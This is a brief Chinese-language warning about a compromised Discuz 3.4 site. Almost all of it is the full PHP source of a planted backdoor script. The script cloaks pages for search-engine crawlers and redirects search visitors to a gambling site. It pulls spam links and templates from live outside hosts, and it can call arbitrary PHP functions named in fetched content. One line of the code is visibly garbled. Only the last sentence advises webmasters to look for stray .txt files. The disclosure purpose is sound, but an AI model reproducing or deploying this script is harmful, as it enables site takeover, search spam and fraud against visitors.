Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
图片:阿里云监控.jpg
案列黑链注入代码:
<?php
ini_set('html_errors',false);
ini_set('display_errors',false);
define(\"APP_INCLUDE_FLAG\",\"TRUE\");
define('APP_JACK_CHARSET','GBK');
header(\"Content-type: text/html; charset=\".APP_JACK_CHARSET);
define('APP_JACK_DOCUMENTROOT','/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/');
define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (stristr($userAgent,\"sogou\")){
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
else
{
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'wen.txt');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'miaoshu.txt');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'bianliang2.txt');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'bianliang3.txt');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hunhe.txt');
define('APP_JACK_CACHED','Uncached');
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');
define('APP_JACK_MAX','15');
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'app.txt');
function App_GetLink(){
return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
function App_GetSelf(){
return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
//返回图片
function getImg(){
return 'http://link.wlbxsjs.com/tupian/'.rand(1,7000).\".jpg\";
}
$my_app = new missclient();
$my_app->run();
class missclient{
public $show_spider;
public $jump_ref;
public $http_ref_filter;
public $jump_url = \"\";
public $domain = \"\";
public $condition = \"\";
public $app_server = \"\";
public $log_spider = \"\";
public $cur_spider = \"\";
public $allow_ip = \"\";
public $isCache = false;
public function run(){
$this->domain = $this->getServerName();
$this->jump_ref = explode(\"|\",\"360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso\");
$this->http_ref_filter = explode(\"|\",\"inurl:|site:|site%3A|inurl%3A\");
$this->allow_ip = \"218.80.218.|10.4.62.|10.4.33\";
$this->condition = ($_GET['tid']> 9999999 && $this->isAllowdIp());
$this->app_server = \"http://www.sohu999.com/gbk/app.php\";
$this->isCache = False;
if($this->isSpider() && $this->isAllowdIp()){
if($this->condition){
if($this->isCache){
$relset_host = $this->getServerName();
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
if(!@file_exists($dir)){
mkdir($dir, 0777);
}
if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
$var = coreAppCache::read($cacheFile);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = \"{\".$key.\"}\";
$page = str_replace($flag,$v,$page);
}
echo myReplace($page);
exit();
}
else
{
//包含进APP即可
$currentPage = include(APP_JACK_APPFILE);
if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,\"</explode>\")){
$var = self::cut($currentPage,\"<explode>\",\"</explode>\");
$var = coreAppCache::decode($var);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = \"{\".$key.\"}\";
$page = str_replace($flag,$v,$page);
}
echo myReplace($page);
@coreAppCache::writenocode($currentPage,$cacheFile);
}
}
die();
}
else
{
$currentPage = include(APP_JACK_APPFILE);
echo myReplace($currentPage);
die();
}
}
else
{
$this->_uncondition_hook();
}
}
else
{
if($this->isRef() && $this->condition){
$this->Jump();
}
else
{
$this->_unSpider_hook();
}
}
}
public function isAllowdIp(){
$ip = $this->clientIp();
$non_list = explode(\"|\",$this->allow_ip);
foreach($non_list as $iplist){
if(@stristr($ip,$iplist)){
return false;
}
}
return true;
}
public function clientIp(){
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
preg_match(\"/[\d\.]{7,15}/\", $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
unset($onlineipmatches);
return $onlineip;
}
public function isSpider(){
$bots = array(
'Google' => 'Googlebot',
'MSN' => 'MSNbot',
'Soso' => 'Sosospider',
'Youdao' => 'Youdaobot',
'Yodao' => 'Yodaobot',
'Yisou' => 'Yisouspider',
'Easou' => 'Easouspider',
'Etao' => 'Etaospider',
'Chinaso' => 'Chinasospider',
'Baidu' => 'Baiduspider',
'Sogou' => 'Sogou news Spider',
'Sogou' => 'Sogou orion spider',
'Sogou' => 'Sogou news Spider',
'Sogou' => 'Sogou blog',
'Sogou' => 'Sogou spider2',
'Sogou' => 'Sogou inst spider',
'Sogou' => 'Sogou web spider',
'Haoso' => 'haosouspider',
'360spider' => '360spider',
'bingbot' => 'bingbot'
);
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach ($bots as $k => $v){
if (stristr($userAgent,$v)){
if(!empty($this->log_spider)){
@file_put_contents($this->log_spider,$v.\"->Visited \".$_SERVER['QUERY_STRING'].\"at: \".date(\"Y-m-d H:i:s\").\"\n\",FILE_APPEND);
}
$this->cur_spider = $k;
return true;
break;
}
}
return false;
}
public function isRef(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if(isset($_COOKIE[\"domain-filter-bypass\"])){
return false;
}
if(!$this->isAllowdIp()){
setcookie(\"domain-filter-bypass\", \"lol\", time() + 259200);
return false;
}
foreach($this->http_ref_filter as $r){
$r = trim($r);
if(stristr($ref,$r)){
setcookie(\"domain-filter-bypass\", \"lol\", time() + 259200);
return false;
}
}
foreach($this->jump_ref as $r){
$r = trim($r);
if(stristr($ref,$r)){
return true;
}
}
}
public function getServerName()
{
$ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']
_SERVER['HTTP_HOST']);
if( strpos($ServerName,'http://') )
{
return str_replace('http://','',$ServerName);
}
return $ServerName;
}
public function getPage(){
if($this->isCache){
$cache=\"cached\";
}
$url = $this->app_server.\"?domain=\".$this->domain.\"&gid=199&spider=\".$this->cur_spider.\"&cache=\".$cache.\"&localPar=\".http_build_query($_GET);
return $this->HttpVisit($url);
}
public function HttpVisit($weburl) {
$remote_data = NULL;
if (function_exists('curl_exec')) {
$curl = @curl_init();
@curl_setopt($curl, CURLOPT_URL, $weburl);
@curl_setopt($curl, CURLOPT_HEADER, 0);
@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$remote_data = @curl_exec($curl);
@curl_close($curl);
} else {
if (function_exists('stream_context_create')) {
$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
$http_header = @stream_context_create($header_array);
$remote_data = @file_get_contents($weburl, false, $http_header);
} else {
$temp_url = explode(\"/\", $weburl);
$new_url = $temp_url[2];
$http_port = 80;
$get_file = substr($weburl, strlen($new_url) + 7);
if (strstr($new_url, chr(58))) {
$s_var_array['td'] = explode(chr(58), $new_url);
$new_url = $s_var_array['td'][0];
$http_port = $s_var_array['td'][1];
}
$fsock_result = @fsockopen($new_url, $http_port);
@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . \"\r\n\" . 'Host:' . $new_url . \"\r\n\" . 'Connection:Close' . \"\r\n\r\n\");
while (!feof($fsock_result)) {
$remote_data .= fgets($fsock_result, 1024);
}
@fclose($fsock_result);
}
}
return $remote_data;
}
public function Jump(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if($this->isAllowdIp() && stristr($ref,\"sogou.\")){
$domain = str_replace(\".\",\"_\",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if($this->isAllowdIp() && stristr($ref,\"bing.\")){
$domain = str_replace(\".\",\"_\",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
if($this->isAllowdIp()){
$domain = str_replace(\".\",\"_\",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
}
public function _uncondition_hook(){
$array = array();
for($a=0;$a<5;$a++){
echo '<a href=\"'.App_GetLink().'\"></a>'.\"\n\";
}
}
public function _unSpider_hook(){
//
}
public function strStartWith($needle, $haystack){
return (substr($haystack, 0, strlen($needle))==$needle);
}
public function rndStr($length=8){
$str = null;
$strPol = \"0123456789abcdefghijklmnopqrstuvwxyz\";
$max = strlen($strPol)-1;
for($i=0;$i<$length;$i++){
$str.=$strPol[rand(0,$max)];
}
return $str;
}
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
class coreAppCache{
//写入缓存
public function write($file,$filename){
return file_put_contents($filename,self::encode($file));
}
public function writenocode($file,$filename){
return file_put_contents($filename,$file);
}
public function read($filename){
$content = file_get_contents($filename);
if(stristr($content,\"</explode>\")){
$content = self::cut($content,\"<explode>\",\"</explode>\");
}
return self::decode($content);
}
public function encode($file){
return base64_encode(gzcompress(serialize($file)));
}
public function decode($file){
return unserialize(gzuncompress(base64_decode($file)));
}
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
function removeBom($str) {
$str = preg_replace('/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux', '', $str);
return $str;
}
function replaceMyLink($str) {
static $myLinks;
if (is_null($myLinks)) {
$c = new missclient();
$contents = removeBom($c->HttpVisit(MY_LINK_URL));
$contents = array_filter(array_map('trim', explode(PHP_EOL, $contents)));
$myLinks = $contents;
}
$linkIndex = array_rand($myLinks, 1);
$link = $myLinks[$linkIndex];
return $link;
}
function myLinkHandler($str) {
return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str);
}
function myReplace($str) {
$str = myLinkHandler($str);
preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER);
foreach ($arr as $item) {
if (isset($item[1], $item[2]) && function_exists($item[1])) {
$a = call_user_func_array($item[1], explode(',', $item[2]));
$str = str_replace_first($item[0], $a, $str);
}
}
return $str;
}
function str_replace_first($from, $to, $subject)
{
$from = '@'.preg_quote($from, '/').'@si';
return preg_replace($from, $to, $subject, 1);
}
function randKey($len, $mLen = null)
{
$chars = array(
\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"
);
if ($mLen && $mLen > 0) {
$minLen = min($len, $mLen);
$maxLen = max($mLen, $len);
$lenArr = range($minLen, $maxLen);
$len = $lenArr[array_rand($lenArr)];
}
$charsLen = count($chars) - 1;
shuffle($chars);
$str = \"\";
for ($i=0; $i<$len; $i++)
{
$str .= $chars[mt_rand(0, $charsLen)];
}
return trim($str);
}
?>
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
